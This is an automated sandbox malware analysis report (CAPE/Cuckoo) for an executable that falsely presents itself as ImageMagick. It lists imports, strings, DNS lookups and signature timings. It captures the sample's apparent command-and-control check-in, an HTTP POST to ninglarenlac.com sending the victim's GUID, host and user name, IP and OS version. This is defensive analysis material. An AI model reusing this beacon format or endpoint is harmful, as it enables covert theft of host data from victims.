0x40e0c8 CreateFileW
0x40e0cc TlsFree
0x40e0d0 GetModuleHandleW
0x40e0d4 SetLastError
0x40e0d8 GetCurrentThreadId
0x40e0dc GetProcAddress
0x40e0e0 HeapCreate
0x40e0e4 ExitProcess
0x40e0e8 WriteFile
0x40e0ec GetStdHandle
0x40e0f0 GetModuleFileNameW
0x40e0f4 SetHandleCount
0x40e0fc GetFileType
0x40e100 GetStartupInfoW
0x40e104 Sleep
0x40e108 GetConsoleCP
0x40e10c GetConsoleMode
0x40e110 CreateMutexA
0x40e114 FlushFileBuffers
0x40e118 RtlUnwind
0x40e11c LCMapStringW
0x40e120 MultiByteToWideChar
0x40e124 RaiseException
0x40e134 VirtualProtect
0x40e138 GetTickCount
0x40e13c GetCurrentProcessId
0x40e144 GetStringTypeW
0x40e148 SetFilePointer
0x40e14c LoadLibraryW
0x40e150 HeapReAlloc
0x40e154 WriteConsoleW
0x40e158 SetStdHandle
0x40e15c ReadFile
0x40e160 HeapSize

.text
`.rdata
@.data
.rsrc
Jq@@`@mb+
@+@@@
S:b8Y
@p~.]
1b"yl
S@>'@
icH cN@|@
@+@@@PO
'n@R@u
@@@Qb
3:~RO
@@@[@@
QR@Z"
NpC@J
%DbQt@@
@v@0@);
@|-@M
F@DGD
@sP@@
@}z@b~
@@]PG
k4`+&W@@@@+
@g@{c
O4t'F
E@@G@
`@:A#f
q$.nJ@
n@fvo
@B:@D
W@m_}
G+@@)
fr_q@
@9nb1
TH@d*
@N"r@@ L
~@@#p
q@@KQ
@@fE.X@
@CKy=
$@@@@r
@@aU@
~@[@@
gzS@o
*@j@@
@@]@0
(SR*LG
xWbza
9*&+Op
@@}a@
}@7@[O@
@+B=E
$A@@@@
@s@;#
@-1G@
r#@#@
@@<A@
y@@@,
@@C<+
@g@O)N
j@@as@+@*8
@@@rX
@B@!@
W@+?@'@
@@z@@*)
@+>@@
@@@@@@V
@@1@@
'@@^@
qm@&0
@@@Oz
YwnAN
~@@w@c
|@@@@
@~@@mJz
@;7@@
[Bv@@/
N;uaD1@@
@w@@/
@dEbn@@F
@@@kT
@@XI@
@@k@0@B
w@@]@
@SG@@@
n@u@&@
bK=@v
?}v @
@@8wP
[p@`@pf@@
BC~b@@
N2fh<Z4
@OG@@@@
=#@W@
Mr@^c_
BgC&@@
@@V'@
@2@6+
@^@@>
+nKTbE:@A
@@@Y@
Y;@^@
@@r-@@@
//ggA@@
%@@@B
g@@Hbn
+Mh @C
@@b7@@
@L3G@
A@@H@
q@@@@+
-msHT
uan t
teil
WNetGetUniversalNameA
MPR.dll
GetVolumeNameForVolumeMountPointA
CreateFileA
FindVolumeClose
GetDriveTypeW
SetErrorMode
QueryDosDeviceA
WaitForSingleObject
SetEvent
ReadDirectoryChangesW
FindNextVolumeMountPointA
InitializeCriticalSection
WideCharToMultiByte
GetVolumeInformationA
LeaveCriticalSection
GetFileAttributesA
GetOverlappedResult
GetLastError
FindVolumeMountPointClose
EnterCriticalSection
CreateEventW
WaitForMultipleObjects
GetVolumePathNamesForVolumeNameA
FindFirstVolumeMountPointA
DeleteCriticalSection
FindFirstVolumeA
CloseHandle
FindNextVolumeA
CreateThread
HeapFree
HeapAlloc
GetCommandLineA
GetCommandLineW
HeapSetInformation
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
GetCPInfo
InterlockedIncrement
InterlockedDecrement
GetACP
GetOEMCP
IsValidCodePage
EncodePointer
TlsAlloc
TlsGetValue
TlsSetValue
DecodePointer
TlsFree
GetModuleHandleW
SetLastError
GetCurrentThreadId
GetProcAddress
HeapCreate
ExitProcess
WriteFile
GetStdHandle
GetModuleFileNameW
SetHandleCount
InitializeCriticalSectionAndSpinCount
GetFileType
GetStartupInfoW
Sleep
GetConsoleCP
GetConsoleMode
CreateMutexA
FlushFileBuffers
RtlUnwind
LCMapStringW
MultiByteToWideChar
RaiseException
FreeEnvironmentStringsW
GetEnvironmentStringsW
QueryPerformanceCounter
VirtualProtect
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
GetStringTypeW
SetFilePointer
LoadLibraryW
HeapReAlloc
WriteConsoleW
SetStdHandle
ReadFile
HeapSize
IsProcessorFeaturePresent
CreateFileW
KERNEL32.dll
oNxx0
I%x{/R
))M"0
202L2P2
IDR_MAGICKICON
VS_VERSION_INFO
StringFileInfo
040904b0
ProductName
ImageMagick
FileDescription
ImageMagick Studio library and utility programs
OriginalFilename
ImageMagick
InternalName
ImageMagick
FileVersion
6.7.9
ProductVersion
6.7.9
CompanyName
ImageMagick Studio
LegalCopyright
Copyright (C) 1999-2012 ImageMagick Studio LLC
Comments
ImageMagick 6.7.9-7 2012-09-21 Q16 http://www.imagemagick.org
VarFileInfo
Translation
This file is not on VirusTotal.

Process Tree


werd.exe, PID: 2972, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\werd.exe
Command Line: "C:\Users\user\AppData\Local\Temp\werd.exe"

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 23.21.121.219 [VT] United States
N 191.101.20.16 [VT] Netherlands

TCP

Source Source Port Destination Destination Port
192.168.35.21 49164 191.101.20.16 ninglarenlac.com 80
192.168.35.21 49165 191.101.20.16 ninglarenlac.com 80
192.168.35.21 49166 191.101.20.16 ninglarenlac.com 80
192.168.35.21 49167 191.101.20.16 ninglarenlac.com 80
192.168.35.21 49168 191.101.20.16 ninglarenlac.com 80
192.168.35.21 49169 191.101.20.16 ninglarenlac.com 80
192.168.35.21 49170 191.101.20.16 ninglarenlac.com 80
192.168.35.21 49171 191.101.20.16 ninglarenlac.com 80
192.168.35.21 49172 191.101.20.16 ninglarenlac.com 80
192.168.35.21 49163 23.21.121.219 api.ipify.org 80

UDP

Source Source Port Destination Destination Port
192.168.35.21 53447 8.8.8.8 53
192.168.35.21 58094 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
api.ipify.org [VT] A 23.21.121.219 [VT]
CNAME nagano-19599.herokussl.com [VT]
A 50.16.248.221 [VT]
A 50.19.229.252 [VT]
A 54.221.234.215 [VT]
A 23.23.114.123 [VT]
A 54.243.123.39 [VT]
CNAME elb097307-934924932.us-east-1.elb.amazonaws.com [VT]
ninglarenlac.com [VT] A 191.101.20.16 [VT]

HTTP Requests

URI Data
http://api.ipify.org/
GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache

http://ninglarenlac.com/4/forum.php
POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: ninglarenlac.com
Content-Length: 118
Cache-Control: no-cache

GUID=11855836160270601216&BUILD=03gre12&INFO=WIN7-X64-CUCKOO @ WIN7-X64-CUCKOO\user&IP=5.62.62.203&TYPE=1&WIN=6.1(x64)

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.

Comments



No comments posted

Processing ( 1.598 seconds )

  • 0.896 Static
  • 0.158 CAPE
  • 0.146 BehaviorAnalysis
  • 0.144 TargetInfo
  • 0.139 TrID
  • 0.048 Deduplicate
  • 0.044 NetworkAnalysis
  • 0.01 Strings
  • 0.007 AnalysisInfo
  • 0.004 config_decoder
  • 0.002 Debug

Signatures ( 0.167 seconds )

  • 0.016 antiav_detectreg
  • 0.007 stealth_timeout
  • 0.007 infostealer_ftp
  • 0.007 ransomware_files
  • 0.006 persistence_autorun
  • 0.006 antiav_detectfile
  • 0.006 ransomware_extensions
  • 0.005 api_spamming
  • 0.005 decoy_document
  • 0.004 infostealer_bitcoin
  • 0.004 infostealer_im
  • 0.003 injection_createremotethread
  • 0.003 antivm_generic_disk
  • 0.003 vawtrak_behavior
  • 0.003 antianalysis_detectfile
  • 0.003 antianalysis_detectreg
  • 0.003 modify_proxy
  • 0.003 browser_security
  • 0.003 disables_browser_warn
  • 0.003 infostealer_mail
  • 0.002 tinba_behavior
  • 0.002 InjectionInterProcess
  • 0.002 bootkit
  • 0.002 rat_nanocore
  • 0.002 Doppelganging
  • 0.002 stealth_file
  • 0.002 mimics_filetime
  • 0.002 antivm_vbox_libs
  • 0.002 InjectionCreateRemoteThread
  • 0.002 reads_self
  • 0.002 cerber_behavior
  • 0.002 virus
  • 0.002 hancitor_behavior
  • 0.002 antivm_vbox_files
  • 0.002 antivm_vbox_keys
  • 0.002 geodo_banking_trojan
  • 0.002 network_torgateway
  • 0.001 lsass_credential_dumping
  • 0.001 malicious_dynamic_function_loading
  • 0.001 dyre_behavior
  • 0.001 antiav_avast_libs
  • 0.001 exploit_getbasekerneladdress
  • 0.001 network_anomaly
  • 0.001 antiemu_wine_func
  • 0.001 injection_explorer
  • 0.001 betabot_behavior
  • 0.001 kazybot_behavior
  • 0.001 exploit_gethaldispatchtable
  • 0.001 InjectionProcessHollowing
  • 0.001 kibex_behavior
  • 0.001 shifu_behavior
  • 0.001 exec_crash
  • 0.001 infostealer_browser_password
  • 0.001 ursnif_behavior
  • 0.001 dynamic_function_loading
  • 0.001 injection_runpe
  • 0.001 kovter_behavior
  • 0.001 process_needed
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_vmware_keys
  • 0.001 antivm_xen_keys
  • 0.001 banker_zeus_mutex
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_addon
  • 0.001 disables_system_restore
  • 0.001 modify_security_center_warnings
  • 0.001 modify_uac_prompt
  • 0.001 recon_fingerprint
  • 0.001 stealth_hiddenreg

Reporting ( 0.029 seconds )

  • 0.028 SubmitCAPE
  • 0.001 CompressResults
Task ID 25398
Mongo ID 5c06bbbcf284886b7cb819b5
Cuckoo release 1.3-CAPE
Delete